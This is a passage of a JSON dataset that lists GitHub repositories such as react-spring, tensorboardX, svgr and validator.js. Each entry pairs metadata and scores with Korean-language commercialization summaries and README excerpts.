\"mo · js\")](https://mojs.github.io/)\n\n## Intro\n**mo · js** is a javascript motion graphics library that is a **fast, retina ready, modular and open source**. In comparison to other libraries, it has a different syntax and code animation structure approach. The declarative API provides you a complete control over the animation, making it customizable with ease.\n\nThe library provides **built-in","composite_score":0.25,"license_safety_tag":"safe"},{"name":"lanpa/tensorboard-pytorch","github_url":"https://github.com/lanpa/tensorboard-pytorch","stars":5,"language":"Python","license":"MIT","abandonment_months":2,"description":"# lanpa/tensorboard-pytorch 평가 보고서\n\n## 왜 보물인가\n머신러닝 모델 학습 과정을 실시간으로 시각화하고 모니터링할 수 있는 도구로, 데이터 과학자들의 작업 효율을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 모델 학습 플랫폼 SaaS**\n- 클라우드 기반 머신러닝 플랫폼에서 사용자의 모델 학습 과정을 대시보드로 ","readme_excerpt":"# tensorboardX\n\n[![PyPI version](https://badge.fury.io/py/tensorboardX.svg)](https://badge.fury.io/py/tensorboardX)\n[![Documentation Status](https://readthedocs.org/projects/tensorboardx/badge/?version=latest)](https://tensorboardx.readthedocs.io/en/latest/?badge=latest)\n[![Coverage Status](https://codecov.io/gh/lanpa/tensorboardX/branch/master/graph/badge.svg)](https://codecov.io/gh/lanpa/tensorboardX/)\n\nWrite TensorBoard events with simple function call.\n\nThe current release (v2.6.5) is tested with PyTorch 2.6 / torchvision 0.21.0 / tensorboard 2.19.0 on Python 3.10 to 3.13\n\n* Support `scalar`, `image`, `figure`, `histogram`, `audio`, `text`, `graph`, `onnx_graph`, `embedding`, `pr_curve`, `mesh`, `hyper-parameters`\n  and `video` summaries.\n\n* [FAQ](https://github.com/lanpa/tensorboardX/wiki)\n\n\n## Install\n\n`pip install tensorboardX`\n\nor build from source:\n\n`pip install 'git+https://github.com/lanpa/tensorboardX'`\n\nYou can optionally install [`crc32c`](https://github.com/ICRAR/crc32c)","composite_score":0.2499,"license_safety_tag":"safe"},{"name":"react-spring/react-spring","github_url":"https://github.com/react-spring/react-spring","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://i.imgur.com/QZownhg.png\" width=\"240\" />\n</p>\n\n<br />\n\n<h1 align=\"center\">react-spring</h1>\n<h3 align=\"center\">A spring-physics first animation library <br>giving you flexible tools to confidently cast your ideas</h3>\n\n<br>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/react-spring\" target=\"_blank\">\n    <img src=\"https://img.shields.io/npm/v/react-spring.svg?style=flat&colorA=000000&colorB=000000\" />\n  </a>\n  <a href=\"https://www.npmjs.com/package/react-spring\" target=\"_blank\">\n    <img src=\"https://img.shields.io/npm/dm/react-spring.svg?style=flat&colorA=000000&colorB=000000\" />\n  </a>\n  <a href=\"https://discord.gg/AXfNsGx64f\" target=\"_blank\">\n    <img src=\"https://img.shields.io/discord/740090768164651008?style=flat&colorA=000000&colorB=000000&label=discord&logo=discord&logoColor=ffffff\" alt=\"Chat on Discord\">\n  </a>\n</p>\n\n<br>\n\n`react-spring` is a cross-platform spring-physics first animation library.\n\nIt's as simple as:\n\n```jsx\nc","composite_score":0.2499,"license_safety_tag":"safe"},{"name":"smooth-code/svgr","github_url":"https://github.com/smooth-code/svgr","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":3,"description":"# smooth-code/svgr 분석\n\n## 왜 보물인가\n디자이너가 만든 그림 파일을 웹사이트에서 바로 사용할 수 있게 자동으로 변환해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **디자인 협업 SaaS**: 팀 내 디자이너와 개발자가 그림 파일을 공유하고 자동 변환하는 클라우드 플랫폼\n2. **내부 업무 도구**: 대형 기업의 디자인 시스템 관리","readme_excerpt":"<h1 align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/gregberge/svgr/master/resources/svgr-logo.png\" alt=\"svgr\" title=\"svgr\" width=\"300\">\n</h1>\n<p align=\"center\" style=\"font-size: 1.2rem;\">Transform SVGs into React components 🦁</p>\n\n[![License](https://img.shields.io/npm/l/@svgr/core.svg)](https://github.com/gregberge/svgr/blob/master/LICENSE)\n[![Donate](https://opencollective.com/svgr/backers/badge.svg)](https://opencollective.com/svgr/donate)\n[![npm package](https://img.shields.io/npm/v/@svgr/core/latest.svg)](https://www.npmjs.com/package/@svgr/core)\n[![npm downloads](https://img.shields.io/npm/dm/@svgr/core.svg)](https://www.npmjs.com/package/@svgr/core)\n[![CI](https://github.com/gregberge/svgr/actions/workflows/ci.yml/badge.svg)](https://github.com/gregberge/svgr/actions/workflows/ci.yml)\n[![Code Coverage](https://img.shields.io/codecov/c/github/gregberge/svgr.svg)](https://codecov.io/github/gregberge/svgr)\n\n[**Try it out online!**](https://react-svgr.com/playground)\n\n","composite_score":0.2497,"license_safety_tag":"safe"},{"name":"fossasia/admin.susi.ai","github_url":"https://github.com/fossasia/admin.susi.ai","stars":12,"language":"Python","license":"Apache-2.0","abandonment_months":4,"description":"# fossasia/admin.susi.ai 상용화 분석\n\n## 왜 보물인가\nSUSI AI의 관리자 대시보드로, 누구나 쉽게 인공지능 챗봇을 운영·관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업들이 자체 AI 챗봇을 구축·운영하도록 지원하는 웹 기반 서비스\n- **내부 업무 도구**: 콜센터나 고객지원팀이 AI 챗봇","readme_excerpt":"|logo|\n\n``eventyay-talk`` is a comprehensive conference planning tool designed to deliver an exceptional experience for organizers, speakers, reviewers, and attendees. It efficiently manages the submission process with a customizable Call for Participation, facilitates the review and selection of submissions, and handles scheduling and release logistics. Post-event, ``eventyay-talk`` enables speakers to receive feedback, upload their slides, and allows organizers to embed recordings.\n\nFor a detailed overview of its capabilities, check out our feature list on our main site. ``eventyay-talk`` typically covers all the essential tasks required to curate submissions and content for a multi-track, multi-day conference.\n\nYou can host eventyay-talk yourself, or use our public instance at `eventyay.com`.\n\n|screenshots|\n\n``eventyay-talk`` is highly customizable, allowing you to modify its appearance and behavior to suit your event's needs. If the default settings don't meet your requirements, yo","composite_score":0.2493,"license_safety_tag":"safe"},{"name":"shenweichen/GraphEmbedding","github_url":"https://github.com/shenweichen/GraphEmbedding","stars":5,"language":"Python","license":"MIT","abandonment_months":1,"description":"# GraphEmbedding 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 관계를 단순한 숫자 형태로 변환하는 기술로, 추천 시스템이나 사기 탐지 같은 실무 문제를 효율적으로 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **추천 시스템 SaaS**: 온라인 쇼핑몰, 스트리밍 서비스에서 고객별 맞춤 상품/콘텐츠 추천 엔진 제공\n- **기업 내부 도구","readme_excerpt":"# GraphEmbedding\n\n[![GitHub Issues](https://img.shields.io/github/issues/shenweichen/graphembedding.svg\n)](https://github.com/shenweichen/graphembedding/issues)\n[![CI status](https://github.com/shenweichen/graphembedding/actions/workflows/ci.yml/badge.svg)](https://github.com/shenweichen/graphembedding/actions/workflows/ci.yml)\n[![codecov](https://codecov.io/gh/shenweichen/graphembedding/branch/master/graph/badge.svg)](https://codecov.io/gh/shenweichen/graphembedding)\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/c46407f5931f40048e28860dccf7dabc)](https://www.codacy.com/gh/shenweichen/GraphEmbedding/dashboard?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=shenweichen/GraphEmbedding&amp;utm_campaign=Badge_Grade)\n[![Disscussion](https://img.shields.io/badge/chat-wechat-brightgreen?style=flat)](./README.md#disscussiongroup--related-projects)\n\n[comment]: <> ([![License]&#40;https://img.shields.io/github/license/shenweichen/graphembedding.svg&#41;]&#40;https://g","composite_score":0.2491,"license_safety_tag":"safe"},{"name":"vechain/connex","github_url":"https://github.com/vechain/connex","stars":82,"language":"TypeScript","license":"LGPL-3.0","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.2491,"license_safety_tag":"restricted"},{"name":"chriso/validator.js","github_url":"https://github.com/chriso/validator.js","stars":7,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# validator.js 상용화 분석 보고서\n\n## 왜 보물인가\n사용자가 입력한 정보(이메일, 전화번호, 주소 등)가 올바른지 자동으로 검사해주는 도구로, 모든 온라인 서비스에 필수적인 기능입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 회원가입 SaaS 서비스**\n신청 양식에서 실시간으로 입력 오류를 지적해주는 기능으로 고객 만족도 향상\n\n**2. 전자상","readme_excerpt":"# validator.js\n[![NPM version][npm-image]][npm-url]\n[![CI][ci-image]][ci-url]\n[![Coverage][codecov-image]][codecov-url]\n[![Downloads][downloads-image]][npm-url]\n[![Backers on Open Collective](https://opencollective.com/validatorjs/backers/badge.svg)](#backers)\n[![Sponsors on Open Collective](https://opencollective.com/validatorjs/sponsors/badge.svg)](#sponsors)\n[![License](https://img.shields.io/badge/License-MIT-red.svg)](https://github.com/alguerocode/validator.js/blob/master/LICENSE)\n[![Gitter][gitter-image]][gitter-url]\n\nA library of string validators and sanitizers.\n\n## Strings only\n\n**This library validates and sanitizes strings only.**\n\nIf you're not sure if your input is a string, coerce it using `input + ''`.\nPassing anything other than a string will result in an error.\n\n## Installation and Usage\n\n### Server-side usage\n\nInstall the `validator` package as:\n\n```sh\nnpm i validator\nyarn add validator\npnpm i validator\n```\n\n#### No ES6\n\n```javascript\nvar validator = require('validat","composite_score":0.249,"license_safety_tag":"safe"},{"name":"awslabs/aws-sam-local","github_url":"https://github.com/awslabs/aws-sam-local","stars":11,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# aws-sam-local 상용화 분석\n\n## 왜 보물인가\n아마존 클라우드를 쓰는 개발자들이 자신의 컴퓨터에서 미리 테스트할 수 있게 해주는 도구로, 클라우드 비용 낭비와 배포 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 개발 교육 플랫폼**: 학생과 신입 개발자가 아마존 클라우드 기술을 저렴하게 학습할 수 있는 온라인 ","readme_excerpt":"<p align=\"center\">\n</p>\n\n# AWS SAM CLI\n\n[![Apache 2.0 License](https://img.shields.io/github/license/aws/aws-sam-cli)](https://github.com/aws/aws-sam-cli/blob/develop/LICENSE)\n![SAM CLI Version](https://img.shields.io/github/release/aws/aws-sam-cli.svg?label=CLI%20Version)\n![Install](https://img.shields.io/badge/brew-aws/tap/aws--sam--cli-orange)\n![pip](https://img.shields.io/badge/pip-aws--sam--cli-9cf)\n\n[Installation](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-cli-install.html) | [Blogs](https://serverlessland.com/blog?tag=AWS%20SAM) | [Videos](https://serverlessland.com/video?tag=AWS%20SAM) | [AWS Docs](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/what-is-sam.html) | [Roadmap](https://github.com/aws/aws-sam-cli/wiki/SAM-CLI-Roadmap) | [Try It Out](https://s12d.com/jKo46elk) | [Slack Us](https://join.slack.com/t/awsdevelopers/shared_invite/zt-yryddays-C9fkWrmguDv0h2EEDzCqvw)\n\nThe AWS Serverless Appli","composite_score":0.2489,"license_safety_tag":"safe"},{"name":"thepracticaldev/dev.to","github_url":"https://github.com/thepracticaldev/dev.to","stars":7,"language":"Ruby","license":"AGPL-3.0","abandonment_months":0,"description":"# DEV.to 저장소 분석\n\n## 왜 보물인가\n개발자들이 기술 지식을 공유하고 커뮤니티를 형성하는 플랫폼의 핵심 소스코드로, 콘텐츠 기반 커뮤니티 비즈니스를 만들고 싶은 사업가에게 완성된 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 특정 직군(마케터, 디자이너, 기획자 등)을 위한 지식 공유 커뮤니티 플랫폼을 빠르게 구축\n","readme_excerpt":"<div align=\"center\">\n  <br>\n  <h1>Forem 🌱</h1>\n  <strong>For Empowering Community</strong>\n</div>\n<br>\n<p align=\"center\">\n  <a href=\"https://github.com/forem/forem/actions/workflows/ci.yml\">\n    <img src=\"https://github.com/forem/forem/actions/workflows/ci.yml/badge.svg\" alt=\"Build Status\">\n  </a>\n  <a href=\"https://github.com/forem/forem/actions/workflows/cd.yml\">\n    <img src=\"https://github.com/forem/forem/actions/workflows/cd.yml/badge.svg\" alt=\"Build Status\">\n  </a>\n  <img src=\"https://img.shields.io/github/commit-activity/w/forem/forem\" alt=\"GitHub commit activity\">\n  <a href=\"https://github.com/forem/forem/issues?q=is%3Aissue+is%3Aopen+label%3A%22ready+for+dev%22\">\n    <img src=\"https://img.shields.io/github/issues/forem/forem/ready%20for%20dev\" alt=\"GitHub issues ready for dev\">\n  </a>\n  <a href=\"https://gitpod.io/#https://github.com/forem/forem\">\n    <img src=\"https://img.shields.io/badge/setup-automated-blue?logo=gitpod\" alt=\"GitPod badge\">\n  </a>\n</p>\n\nWelcome to the [Forem]","composite_score":0.2488,"license_safety_tag":"risky"},{"name":"drcmda/react-spring","github_url":"https://github.com/drcmda/react-spring","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# react-spring 사업화 분석\n\n## 왜 보물인가\n웹사이트와 앱에서 부드럽고 자연스러운 애니메이션 효과를 쉽게 만들 수 있는 도구로, 현대적인 사용자 경험을 원하는 모든 디지털 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 대시보드 플랫폼**\n- 데이터 분석 툴, CRM 시스템 등에서 차트와 수치가 부드럽게 변하는 효과를 제","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://i.imgur.com/QZownhg.png\" width=\"240\" />\n</p>\n\n<br />\n\n<h1 align=\"center\">react-spring</h1>\n<h3 align=\"center\">A spring-physics first animation library <br>giving you flexible tools to confidently cast your ideas</h3>\n\n<br>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/react-spring\" target=\"_blank\">\n    <img src=\"https://img.shields.io/npm/v/react-spring.svg?style=flat&colorA=000000&colorB=000000\" />\n  </a>\n  <a href=\"https://www.npmjs.com/package/react-spring\" target=\"_blank\">\n    <img src=\"https://img.shields.io/npm/dm/react-spring.svg?style=flat&colorA=000000&colorB=000000\" />\n  </a>\n  <a href=\"https://discord.gg/AXfNsGx64f\" target=\"_blank\">\n    <img src=\"https://img.shields.io/discord/740090768164651008?style=flat&colorA=000000&colorB=000000&label=discord&logo=discord&logoColor=ffffff\" alt=\"Chat on Discord\">\n  </a>\n</p>\n\n<br>\n\n`react-spring` is a cross-platform spring-physics first animation library.\n\nIt's as simple as:\n\n```jsx\nc","composite_score":0.2487,"license_safety_tag":"safe"},{"name":"jenkins-docs/simple-python-pyinstaller-app","github_url":"https://github.com/jenkins-docs/simple-python-pyinstaller-app","stars":100,"language":"Python","license":"NOASSERTION","abandonment_months":4,"description":"","readme_excerpt":"","composite_score":0.2485,"license_safety_tag":"unknown"},{"name":"mbasso/awesome-wasm","github_url":"https://github.com/mbasso/awesome-wasm","stars":8,"language":"","license":"cc0-1.0","abandonment_months":19,"description":"# awesome-wasm 분석\n\n## 왜 보물인가\n웹 브라우저에서 초고속으로 작동하는 프로그램들을 모아놓은 카탈로그로, 웹 기반 도구의 성능을 획기적으로 향상시킬 수 있는 기술 자산입니다.\n\n## 어디에 쓸 수 있나\n- **영상 편집 SaaS**: 브라우저에서 직접 4K 영상 편집이 가능한 웹 애플리케이션 구축\n- **재무 분석 도구**: 수백만 행의 데","readme_excerpt":"# Awesome Wasm [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n\nCollection of awesome things regarding the WebAssembly (wasm) ecosystem.\n\nPlease read the [contribution guidelines](CONTRIBUTING.md) if you want to contribute.\n\n## Contents\n\n- [General Resources](#general-resources)\n- [Online Playground](#online-playground)\n- [Tutorials](#tutorials)\n- [Compilers](#compilers)\n- [Non-Web Embeddings](#non-web-embeddings)\n- [Projects](#projects)\n  - [AI](#ai)\n  - [Apache Server](#apache-server)\n  - [Web frameworks-libraries](#web-frameworks-libraries)\n  - [Data processing](#data-processing)\n  - [WebGL](#webgl)\n  - [webpack](#webpack)\n  - [Browserify](#browserify)\n  - [Node.js](#nodejs)\n  - [.NET](#net)\n  - [Others](#others)\n- [Languages](#languages)\n  - [Esoteric](#esoteric)\n  - [Forth](#forth)\n  - [Go](#go)\n  - [JavaScript-family](#javascript-family)\n  - [Kotlin](#kotlin)\n  - [Lua](#lua)\n  - [OCAML](#ocaml)\n  - [Python](#python)\n  - [Prolog](#prolog)\n  - [Rust](#rust)\n  - [WASM","composite_score":0.2482,"license_safety_tag":"unknown"},{"name":"abrignoni/iOS-Mobile-Installation-Logs-Parser","github_url":"https://github.com/abrignoni/iOS-Mobile-Installation-Logs-Parser","stars":8,"language":"Roff","license":"unknown","abandonment_months":15,"description":"","readme_excerpt":"Note: This parser has been deprecated in favor of iLEAPP.\nDonwload iLEAPP in order to support the mobile installation logs artifact.\n\n# iOS-Mobile-Installation-Logs-Parser \n\n![alt text](/images/mib_done.PNG \"Usage example\")\n\nScript parses all the logs in the /private/var/installd/Library/Logs/MobileInstalation/*.log*\n\nScript will produce a currently installed apps report, a uninstalled apps report and historical  \nreports for both types per app. \n\nThe types of rows extracted from the logs are for installed apps,  \nmoved containers, made live containers and destroyed containers.\n\nUsage:  \n  \n1) Python 3.6.4 or newer.\n2) Put the script in the same directory as the extracted mobile_installation.log.* files.\n3) Run the script.  \n4) Script will produce a SQLite database named mib.db.\n5) Script will produce two directories named Apps_Historical and Apps_State. Apps_Historical contains text files per app with coresponding app entries. App_State contains two text files, one for installed apps ","composite_score":0.2481,"license_safety_tag":"unknown"},{"name":"thedmd/imgui-node-editor","github_url":"https://github.com/thedmd/imgui-node-editor","stars":5,"language":"C++","license":"MIT","abandonment_months":2,"description":"# imgui-node-editor 상용화 분석\n\n## 왜 보물인가\n복잡한 작업을 시각적으로 연결된 박스들로 쉽게 설계할 수 있는 도구로, 전문가가 아닌 일반인도 직관적으로 업무 흐름을 구성할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 자동화 워크플로우 플랫폼**\n마케팅 자동화, 데이터 처리 파이프라인을 드래그&드롭으로 만드는 ","readme_excerpt":"# Node Editor in ImGui\n\n[![build](https://github.com/thedmd/imgui-node-editor/actions/workflows/build.yml/badge.svg)](https://github.com/thedmd/imgui-node-editor/actions/workflows/build.yml)\n\n## About\n\nAn implementation of node editor with ImGui-like API.\n\nProject purpose is to serve as a basis for more complex solutions like blueprint editors.\n\n![node_editor_overview](https://user-images.githubusercontent.com/1197433/89328475-c01bc680-d68d-11ea-88bf-8c4155480927.gif)\n\nNode Editor is build around an idea \"draw your content, we do the rest\", which mean interactions are handled by editor, content rendering is handled by user. Editor will take care of:\n * placing your node in the word\n * dragging nodes\n * zoom and scrolling\n * selection\n * various interaction that can be queried by API (creation, deletion, selection changes, etc.)\n\nHere are some highlights:\n * Node movement and selection is handled internally\n * Node and pin contents are fully customizable\n * Fully styled, default theme i","composite_score":0.2476,"license_safety_tag":"safe"},{"name":"fossasia/susi_wechatbot","github_url":"https://github.com/fossasia/susi_wechatbot","stars":12,"language":"Python","license":"Apache-2.0","abandonment_months":4,"description":"# fossasia/susi_wechatbot 상용화 분석\n\n## 왜 보물인가\n중국의 가장 큰 메시징 앱인 WeChat과 오픈소스 AI 어시스턴트를 연결하여, 수억 명의 중국 사용자에게 AI 서비스를 제공할 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 중국 기업용 고객 지원 채팅 SaaS**\nWeChat을 통해 기업의 콜센터 역할을 하","readme_excerpt":"eventyay-video\n=========\neventyay-video allows you to run events fully online. You can make use of different modules including live video streams, interactive video calls, group chats and more.\n\nLicense\n-------\n\neventyay-video is released under the terms of the Apache 2 License See the ``LICENSE`` file for the full license text as well as the license parameters.\n\nCredits\n^^^^^^^\n\n`Twemoji <https://twemoji.twitter.com/>`_ emoji graphics are licensed under `Creative Commons Attribution 4.0 International <https://creativecommons.org/licenses/by/4.0/>`_ (CC-BY-4.0) by Twitter, Inc. and other contributors.\n","composite_score":0.2475,"license_safety_tag":"safe"},{"name":"nicejade/markdown-online-editor","github_url":"https://github.com/nicejade/markdown-online-editor","stars":6,"language":"CSS","license":"MIT","abandonment_months":2,"description":"# markdown-online-editor 사업화 분석\n\n## 왜 보물인가\n인터넷 브라우저에서 바로 글을 작성하고 편집할 수 있는 도구로, 별도의 프로그램 설치 없이 누구나 쉽게 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 블로그 플랫폼, 노션 같은 문서 작성 도구, 팀 위키 서비스에 통합하여 고객에게 제공\n2. **내부","readme_excerpt":"<p align=\"center\"><a href=\"https://www.niceshare.site/?ref=github.com\" target=\"_blank\"><img width=\"100\"src=\"https://cdn.jsdelivr.net/gh/nicejade/markdown-online-editor/src/assets/images/logo.png\"></a></p>\n\n<h1 align=\"center\">\n  <a href=\"https://markdown.lovejade.cn/?ref=github.com\">Arya - 在线 Markdown 编辑器</a>\n</h1>\n\n<div align=\"center\">\n  <strong>\n    📝 基于 <a href=\"https://site.lovejade.cn/post/5b1a221c0526c920d6dfaada\">Vue2</a>、<a href=\"https://github.com/Vanessa219/vditor\">Vditor</a>，所构建的在线 Markdown 编辑器，支持绘制流程图、甘特图、时序图、任务列表、Echarts 图表、五线谱，以及 PPT 预览、视频音频解析、HTML 自动转换为 Markdown 等功能。<a href=\"https://markdown.lovejade.cn/?ref=github.com\">markdown.lovejade.cn</a>。\n  </strong>\n</div>\n\n<br>\n\n<div align=\"center\">\n  <a href=\"https://github.com/nicejade/markdown-online-editor\">\n    <img alt=\"GitHub package.json version\" src=\"https://img.shields.io/github/package-json/v/nicejade/markdown-online-editor\">\n  </a>\n  <a href=\"https://github.com/nicejade/markdown-online-editor\">\n    <img src=\"https://i","composite_score":0.2471,"license_safety_tag":"safe"},{"name":"g-HJY/HBluetooth","github_url":"https://github.com/g-HJY/HBluetooth","stars":8,"language":"Java","license":"unknown","abandonment_months":12,"description":"# g-HJY/HBluetooth 분석 리포트\n\n## 왜 보물인가\n휴대폰, 이어폰, 스마트워치 등 무선 기기들을 쉽게 연결할 수 있도록 돕는 기술로, 사물인터넷 시대에 필수적인 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 플랫폼**: 조명, 온도조절기, 도어락 등 가정용 기기들을 스마트폰 하나로 제어하는 앱 개발\n2. **헬스케어 앱**: 스","readme_excerpt":"# HBluetooth\n![未标题-1](https://user-images.githubusercontent.com/15326847/142364112-dc66af7a-440f-4c11-97d5-f3619b892e75.png)\n\n### 简介\n\n封装了支持经典蓝牙或低功耗蓝牙扫描，连接，以及通信的库。附带使用例子。该库后续会持续升级维护，敬请关注...\n\n### 项目优点：\n\n1.轻量级，无过度封装，简单易懂\n\n2.源码关键节点均有注释，学习理解无障碍\n\n3.源码结构按流程分工明确，便于扩展\n\n4.同时兼容经典蓝牙和低功耗蓝牙\n\n5....\n\n### 适用场景：\n\n作为主设备的智能手机（客户端Client）去连接从设备（服务端），如用安卓手机去连接智能电表、手环、灯泡之类。\n\n\n\n### 集成方式\n\n一.项目依赖\n\nTo get a Git project into your build:\n\nStep 1. Add the JitPack repository to your build file\n\nAdd it in your root build.gradle at the end of repositories:\n\n\tallprojects {\n\t\trepositories {\n\t\t\t...\n\t\t\tmaven { url 'https://jitpack.io' }\n\t\t}\n\t}\n\n Step 2. Add the dependency\n\n\tdependencies {\n\t     implementation 'com.github.g-HJY:HBluetooth:V1.4.4'\n\t}\n\n\n二.使用介绍\n\n1.第一步，使用前先在你应用的Application中调init方法初始化HBluetooth：\n\n             public class MyApp extends Application {\n\n                 @Override\n                 public void onCreate() {\n                     super.onCreate();\n                     //初始化 HBluetooth\n                  ","composite_score":0.2469,"license_safety_tag":"unknown"},{"name":"impress/impress.js","github_url":"https://github.com/impress/impress.js","stars":9,"language":"JavaScript","license":"mit","abandonment_months":4,"description":"# impress.js 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 직접 멋진 프레젠테이션을 만들고 공유할 수 있는 오픈소스 도구로, 파워포인트 같은 별도 프로그램 설치 없이 인터넷만 있으면 된다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 브라우저 기반 프레젠테이션 제작 플랫폼 (Canva, Figma 같은 온라인 디자인 도구)\n- ","readme_excerpt":"impress.js\n============\n\n[![CircleCI](https://circleci.com/gh/impress/impress.js.svg?style=svg)](https://circleci.com/gh/impress/impress.js)\n\nIt's a presentation framework based on the power of CSS3 transforms and\ntransitions in modern browsers and inspired by the idea behind prezi.com.\n\n**WARNING**\n\nimpress.js may not help you if you have nothing interesting to say ;)\n\n\nHOW TO USE IT\n---------------\n### Getting Started Guide\nCheck out our new [Getting Started](GettingStarted.md) guide if you want a quick introduction to the project!\n\n### Direct download link to only impress.js\nYou can include this link directly inside of your HTML file in its header. If you want to learn how to do this, you can find a how-to in the [Getting Started](GettingStarted.md) guide.\n- V2.0.0: https://cdn.jsdelivr.net/gh/impress/impress.js@2.0.0/js/impress.js\n- V1.1.0: https://cdn.jsdelivr.net/gh/impress/impress.js@1.1.0/js/impress.js\n- Source: https://cdn.jsdelivr.net/gh/impress/impress.js/js/impress.js\n\n### ","composite_score":0.2469,"license_safety_tag":"safe"},{"name":"corocn/paternity-leave-in-japan","github_url":"https://github.com/corocn/paternity-leave-in-japan","stars":9,"language":"","license":"unknown","abandonment_months":12,"description":"# corocn/paternity-leave-in-japan 분석\n\n## 왜 보물인가\n일본의 육아휴직 제도를 한눈에 정리한 자료로, 인사담당자와 예비 부모들이 복잡한 법률 정보를 쉽게 이해할 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **HR 관리 SaaS**: 기업의 인사시스템에 통합하여 직원들이 육아휴직 자격 및 신청 절차를 자동으로 확인\n2","readme_excerpt":"# paternity-leave-in-japan\n\n男性育休取得実績のある日本のテクノロジー企業を勝手にまとめています。\n2ヶ月以上の取得が基準です。\n\n|会社名|説明|資料|独自制度|\n|-----|----|----|----|\n| [メルカリ](https://about.mercari.com/)| フリマアプリ「メルカリ」 | [here](https://www8.cao.go.jp/shoushi/shoushika/meeting/consortium/05/pdf/ikuji-1.pdf) | [あり](https://careers.mercari.com/jp/benefits/) |\n| [ミクシィ](https://mixi.co.jp/) | モンスターストライク、みてね、TIPSTAR など | [here](https://mixil.mixi.co.jp/people/2615) | [あり](https://mixi.co.jp/esg/social/balance/index.html) |\n| [10X](https://10x.co.jp/) | スーパーマーケット、ドラッグストアなどの小売チェーンがECを立ち上げるためのプラットフォーム「Stailer」| [here](https://10x.co.jp/articles/posts/?id=2021-04-27) | [あり](https://jobs.10x.co.jp/#8705631ef3b740a4a3658353b88bf02b) |\n| [エウレカ](https://eure.jp/) | 恋活・婚活マッチングアプリ「Pairs」 | [here](https://www.wantedly.com/companies/eureka/post_articles/337613) | [あり](https://career.pairs.lv/life#benefits) |\n| [DeNA](https://dena.com/jp/) | ゲーム、ヘルスケア事業など | [here](https://healthcare.dena.com/teams/topics/interview-higurashi/) | [あり](https://dldp.dena.c","composite_score":0.2468,"license_safety_tag":"unknown"},{"name":"iawia002/annie","github_url":"https://github.com/iawia002/annie","stars":7,"language":"Go","license":"MIT","abandonment_months":2,"description":"# annie 저장소 분석\n\n## 왜 보물인가\n온라인 영상·음악을 자동으로 다운로드하는 도구로, 콘텐츠 수집이 필요한 다양한 비즈니스에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 영상 편집자·유튜버를 위한 \"자동 콘텐츠 수집 플랫폼\" 구독 서비스\n- **내부 업무 도구**: 마케팅팀의 경쟁사 콘텐츠 모니터링·분석 자동","readme_excerpt":"<h1 align=\"center\">Lux</h1>\n\n<p align=\"center\"><i>Let there be Lux!</i></p>\n\n<div align=\"center\">\n  <a href=\"https://codecov.io/gh/iawia002/lux\">\n    <img src=\"https://img.shields.io/codecov/c/github/iawia002/lux.svg?style=flat-square\" alt=\"Codecov\">\n  </a>\n  <a href=\"https://github.com/iawia002/lux/actions\">\n    <img src=\"https://img.shields.io/github/actions/workflow/status/iawia002/lux/ci.yml?style=flat-square\" alt=\"GitHub Workflow Status\">\n  </a>\n  <a href=\"https://goreportcard.com/report/github.com/iawia002/lux\">\n    <img src=\"https://goreportcard.com/badge/github.com/iawia002/lux?style=flat-square\" alt=\"Go Report Card\">\n  </a>\n  <a href=\"https://github.com/iawia002/lux/releases\">\n    <img src=\"https://img.shields.io/github/release/iawia002/lux.svg?style=flat-square\" alt=\"GitHub release\">\n  </a>\n  <a href=\"https://formulae.brew.sh/formula/lux\">\n    <img src=\"https://img.shields.io/homebrew/v/lux.svg?style=flat-square\" alt=\"Homebrew\">\n  </a>\n</div>\n\n👾 Lux is a fast and simple video","composite_score":0.2466,"license_safety_tag":"safe"},{"name":"ctubio/Krypto-trading-bot","github_url":"https://github.com/ctubio/Krypto-trading-bot","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":18,"description":"# Krypto-trading-bot 상용화 분석\n\n## 왜 보물인가\n암호화폐 가격 변동을 자동으로 감지해 사고팔기를 스스로 판단하는 프로그램으로, 24시간 쉬지 않고 수익 기회를 놓치지 않을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개인 투자자들이 월 구독료를 내고 웹사이트에서 로그인해 자동 매매 봇을 설정하고 수익을 추적","readme_excerpt":"<img align=\"left\" src=\"https://user-images.githubusercontent.com/1634027/36237231-e611590e-11fa-11e8-8486-6675078501dc.jpg\" /><p align=\"right\">self reminder:<br><b>patience is the mother of science</b></p><br><a href=\"http://ciutatrefugi.barcelona/en/welcome-barcelona\">\\*\\*\\* REFUGEES WELCOME! 